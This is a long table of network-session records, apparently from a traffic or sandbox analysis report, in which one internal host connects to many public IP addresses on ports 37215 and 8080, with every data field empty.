                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32316192.168.2.234373641.165.177.6037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32317192.168.2.2355196157.59.5.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32318192.168.2.2340016145.178.209.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32319192.168.2.233749241.212.198.7837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32320192.168.2.2347874210.138.202.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32321192.168.2.2341092186.76.152.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32322192.168.2.2336832106.93.128.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32323192.168.2.233538282.70.17.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32324192.168.2.2343676179.230.69.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32325192.168.2.2354738183.186.72.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32326192.168.2.233298895.57.33.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32327192.168.2.2359056179.49.161.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32328192.168.2.235075814.31.82.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32329192.168.2.2344380135.243.252.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32330192.168.2.2334258153.8.229.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32331192.168.2.233743098.62.110.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32332192.168.2.235724289.224.224.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32333192.168.2.233284651.33.55.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32334192.168.2.236061012.46.242.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32335192.168.2.2360696105.183.77.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32336192.168.2.233588024.224.117.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32337192.168.2.233607072.239.17.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32338192.168.2.2333580109.131.61.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32339192.168.2.233816224.253.92.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32340192.168.2.2358988183.243.99.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32341192.168.2.235141064.8.194.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32342192.168.2.2358484191.191.231.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32343192.168.2.2338386157.187.164.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32344192.168.2.2351482131.119.68.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32345192.168.2.2354590160.89.232.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32346192.168.2.2344440144.255.125.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32347192.168.2.235622244.90.93.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32348192.168.2.2338102140.240.167.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32349192.168.2.234205897.40.184.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32350192.168.2.2348338188.161.217.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32351192.168.2.234483878.95.87.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32352192.168.2.2355342177.22.144.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32353192.168.2.235023497.214.180.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32354192.168.2.235240437.88.89.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32355192.168.2.2339496150.62.254.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32356192.168.2.234604617.66.161.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32357192.168.2.2346428191.247.227.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32358192.168.2.2335584125.253.20.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32359192.168.2.23398442.13.52.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32360192.168.2.234016267.239.240.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32361192.168.2.2360516136.69.228.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32362192.168.2.2347956208.11.31.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32363192.168.2.233680620.102.7.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32364192.168.2.2333014220.144.204.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32365192.168.2.2348506138.93.203.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32366192.168.2.235301881.100.154.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32367192.168.2.2349588116.71.187.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32368192.168.2.235122292.43.241.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32369192.168.2.2354538141.221.186.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32370192.168.2.2359510211.140.216.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32371192.168.2.2358848182.5.177.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32372192.168.2.2355746211.160.65.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32373192.168.2.235368665.75.109.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32374192.168.2.2347102172.140.118.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32375192.168.2.234132674.97.72.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32376192.168.2.235070027.249.226.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32377192.168.2.23576208.178.163.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32378192.168.2.2334388163.136.174.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32379192.168.2.2353330187.99.52.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32380192.168.2.2348444113.171.217.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32381192.168.2.2351870129.142.126.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32382192.168.2.2356918132.48.168.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32383192.168.2.2336882194.82.81.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32384192.168.2.235115623.172.13.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32385192.168.2.2351442186.246.150.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32386192.168.2.2347706188.151.35.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32387192.168.2.236022250.161.64.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32388192.168.2.2356270126.222.139.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32389192.168.2.2336688218.30.96.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32390192.168.2.2351934183.190.165.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32391192.168.2.2360084205.39.189.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32392192.168.2.2357044130.206.137.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32393192.168.2.234501649.96.64.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32394192.168.2.2343982163.67.104.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32395192.168.2.2355206211.33.29.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32396192.168.2.234492249.56.232.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32397192.168.2.235411450.233.171.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32398192.168.2.2359462170.144.110.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32399192.168.2.235418223.186.58.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32400192.168.2.2345408205.210.161.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32401192.168.2.234150080.53.181.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32402192.168.2.2335622182.212.123.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32403192.168.2.234056888.182.19.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32404192.168.2.2340096191.121.183.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32405192.168.2.2358938222.83.195.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32406192.168.2.2349348196.218.218.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32407192.168.2.2359914193.194.32.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32408192.168.2.2340234100.233.241.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32409192.168.2.233420249.143.42.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32410192.168.2.2353840141.240.29.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32411192.168.2.2337916102.41.249.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32412192.168.2.2350018155.133.127.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32413192.168.2.2345934180.29.26.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32414192.168.2.233718687.73.108.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32415192.168.2.2352866212.213.244.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32416192.168.2.2342476186.185.129.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32417192.168.2.234176083.96.7.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32418192.168.2.2341702173.253.173.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32419192.168.2.2359912143.22.94.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32420192.168.2.2343332118.245.21.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32421192.168.2.234513489.203.135.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32422192.168.2.2337940116.105.113.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32423192.168.2.2345622182.24.132.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32424192.168.2.2356392129.157.3.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32425192.168.2.2339656154.68.7.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32426192.168.2.2359018219.206.222.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32427192.168.2.235235018.201.101.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32428192.168.2.23545022.174.22.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32429192.168.2.2360340152.200.41.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32430192.168.2.235319225.209.254.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32431192.168.2.2333028220.161.215.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32432192.168.2.233917445.54.91.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32433192.168.2.235895285.10.158.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32434192.168.2.2344506120.106.226.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32435192.168.2.2346632139.44.255.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32436192.168.2.234978638.32.48.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32437192.168.2.234537838.240.127.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32438192.168.2.234016259.19.227.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32439192.168.2.2357592171.19.236.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32440192.168.2.235539012.149.206.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32441192.168.2.2342356167.131.58.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32442192.168.2.2342028148.235.38.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32443192.168.2.2336374101.178.139.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32444192.168.2.2342494152.40.21.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32445192.168.2.2334068189.120.214.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32446192.168.2.235332275.91.117.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32447192.168.2.2354406196.179.148.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32448192.168.2.234041048.131.137.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32449192.168.2.2345062129.159.128.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32450192.168.2.233461093.75.139.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32451192.168.2.235054617.186.205.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32452192.168.2.2358804124.225.151.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32453192.168.2.2335204155.238.144.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32454192.168.2.2338266142.219.192.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32455192.168.2.2357530189.135.106.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32456192.168.2.234300064.195.251.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32457192.168.2.2356434106.213.240.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32458192.168.2.23482841.204.135.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32459192.168.2.2351434187.148.117.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32460192.168.2.2341376211.23.7.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32461192.168.2.234808063.216.179.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32462192.168.2.235883886.93.193.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32463192.168.2.2345256222.182.131.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32464192.168.2.235531434.35.88.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32465192.168.2.234185879.33.74.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32466192.168.2.2359374183.70.164.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32467192.168.2.2345978175.219.6.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32468192.168.2.2340032136.117.53.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32469192.168.2.2354674107.49.36.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32470192.168.2.2339006107.50.47.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32471192.168.2.2347662177.207.140.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32472192.168.2.2355928115.88.188.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32473192.168.2.235164682.245.247.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32474192.168.2.2337950139.189.83.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32475192.168.2.236082251.242.50.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32476192.168.2.235117481.197.117.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32477192.168.2.233458070.7.68.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32478192.168.2.2342226173.60.98.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32479192.168.2.234088627.167.153.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32480192.168.2.2337338178.195.0.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32481192.168.2.2351334213.44.80.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32482192.168.2.234549491.97.64.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32483192.168.2.234535050.242.137.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32484192.168.2.234105667.31.124.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32485192.168.2.2350116169.171.16.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32486192.168.2.2350198128.115.53.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32487192.168.2.2342818175.132.159.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32488192.168.2.2357772197.249.158.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32489192.168.2.2358140157.161.78.24937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32490192.168.2.234437672.21.93.1137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32491192.168.2.2343368197.165.64.24237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32492192.168.2.234565841.86.69.22837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32493192.168.2.2347980160.169.216.15737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32494192.168.2.2334846157.86.134.21437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32495192.168.2.2355878116.148.138.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32496192.168.2.2347564197.74.174.9437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32497192.168.2.233353482.7.196.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32498192.168.2.235089695.182.30.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32499192.168.2.235440070.16.169.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32500192.168.2.2333656217.185.217.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32501192.168.2.2344108115.167.212.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32502192.168.2.234800023.29.28.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32503192.168.2.233890077.150.249.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32504192.168.2.2355234168.58.3.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32505192.168.2.2342044153.228.154.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32506192.168.2.2338988223.145.44.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32507192.168.2.2355610129.228.176.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32508192.168.2.236019640.86.114.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32509192.168.2.235968473.171.109.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32510192.168.2.2358070195.15.231.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32511192.168.2.2357470158.246.243.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32512192.168.2.234964638.41.255.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32513192.168.2.234271681.168.132.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32514192.168.2.2360338179.229.65.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32515192.168.2.2339306111.240.117.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32516192.168.2.234969650.209.21.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32517192.168.2.2334002158.3.211.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32518192.168.2.2342984209.108.155.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32519192.168.2.2343582137.29.144.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32520192.168.2.233486043.96.233.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32521192.168.2.235035454.253.46.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32522192.168.2.2340414188.47.217.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32523192.168.2.2351960186.28.116.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32524192.168.2.2347826141.161.39.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32525192.168.2.2332826192.232.62.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
